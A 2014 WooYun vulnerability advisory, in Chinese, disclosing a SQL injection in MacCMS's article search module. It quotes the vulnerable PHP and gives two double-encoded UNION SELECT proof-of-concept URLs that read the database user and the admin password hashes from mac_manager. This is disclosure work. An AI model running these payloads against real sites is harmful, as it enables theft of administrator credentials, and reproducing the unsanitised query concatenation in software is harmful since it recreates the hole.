当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066156

漏洞标题:苹果CMS继续绕过现有全局安全防护措施进行SQL注入,第三发

相关厂商:maccms.com

漏洞作者: magerx

提交时间:2014-06-25 10:50

修复时间:2014-09-23 10:50

公开时间:2014-09-23 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-25: 厂商已经确认,细节仅向厂商公开
2014-06-28: 细节向第三方安全合作伙伴开放
2014-08-19: 细节向核心白帽子及相关领域专家公开
2014-08-29: 细节向普通白帽子公开
2014-09-08: 细节向实习白帽子公开
2014-09-23: 细节向公众公开

简要描述:

下一次该告一段落,打包了,主要是希望开发意识到为什么你们的be()和360_safe3.php没有起到作用

详细说明:

不再具体分析,看第一和第二发,
看下触发页面,inc/module/art.php 第90行:

elseif($method=='search')
{
	$tpl->P["siteaid"] = 25;
	$wd = be("all", "wd");
	
	if(!empty($wd)){
		$tpl->P["wd"] = $wd;
	}
	
	if (isN($tpl->P["wd"]) && isN($tpl->P["ids"]) && isN($tpl->P["pinyin"]) && isN($tpl->P["letter"]) && isN($tpl->P["tag"]) && isN($tpl->P["type"]) ){ alert ("搜索参数不正确"); }
	
	$tpl->P['cp'] = 'artsearch';
	$tpl->P['cn'] = urlencode($tpl->P['wd']).'-'.$tpl->P['pg'].'-'.$tpl->P['order'].'-'.$tpl->P['by'].'-'.$tpl->P['ids']. '-'.$tpl->P['pinyin']. '-'.$tpl->P['type'] .'-'.urlencode($tpl->P['tag']) ;
	echoPageCache($tpl->P['cp'],$tpl->P['cn']);
	
	if (!isN($tpl->P["letter"])){
    	$tpl->P["key"]=$tpl->P["letter"];
    	$tpl->P["des"] = $tpl->P["des"] . " 首字母为" . $tpl->P["letter"];
    	$tpl->P["where"] = $tpl->P["where"] . " AND a_letter='" . $tpl->P["letter"] ."' ";
    }
    
    if (!isN($tpl->P["wd"])) {
    	$tpl->P["key"]=$tpl->P["wd"] ;
    	$tpl->P["des"] = $tpl->P["des"] . " 名称或主演为" . $tpl->P["wd"];
    	$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_name,'".$tpl->P['wd']."')>0 ";
    }
    
    if (!isN($tpl->P["pinyin"])){
    	$tpl->P["key"]=$tpl->P["pinyin"] ;
    	$tpl->P["des"] = $tpl->P["des"] . " 拼音为" . $tpl->P["pinyin"];
    	$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_enname,'".$tpl->P['pinyin']."')>0 ";
    }
    
    if (!isN($tpl->P["tag"])){
		$tpl->P["key"]=$tpl->P["tag"] ;
		$tpl->P["des"] = $tpl->P["des"] . " Tag为" . $tpl->P["tag"];
		$tpl->P["where"] = $tpl->P["where"] . " AND instr(a_tag,'".$tpl->P['tag']."')>0 ";
	}
	
    $tpl->P['typepid'] = 0;
	if(!isN($tpl->P["typeid"])){
		$typearr = $MAC_CACHE['arttype'][$tpl->P['typeid']];
		if (is_array($typearr)){
			$tpl->P['typepid'] = $typearr['t_pid'];
			if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"];  }
			$tpl->P["des"] = $tpl->P["des"] . " 分类为" . $typearr["t_name"];
			$tpl->P["where"] = $tpl->P["where"] . " AND a_type in (" . $typearr["childids"] . ") ";
		}
	}
	
	$db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']);
	$tpl->H = loadFile(MAC_ROOT_TEMPLATE."/art_search.html");
	$tpl->mark();
	$tpl->pageshow();


就这个地方又一大堆注入,直接看测试吧,这里我们用letter做个测试

http://localhost/maccms8_mfb/index.php?m=art-search-letter-1235%2527%2520union%2520select%2520user%2528%2529%2520order%2520by%25201%2520desc%2523


maccmstest.png


http://localhost/maccms8_mfb/index.php?m=art-search-letter-1235%2527%2520union%2520select%2520m_password%2520from%2520mac_manager%2520order%2520by%25201%2520desc%2523


maccmstest2.png


漏洞证明:

maccmstest.png


maccmstest2.png

修复方案:

~。~

版权声明:转载请注明来源 magerx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-06-25 17:30

厂商回复:

看来360防护脚本防护的补全面啊,改进一下。

最新状态:

暂无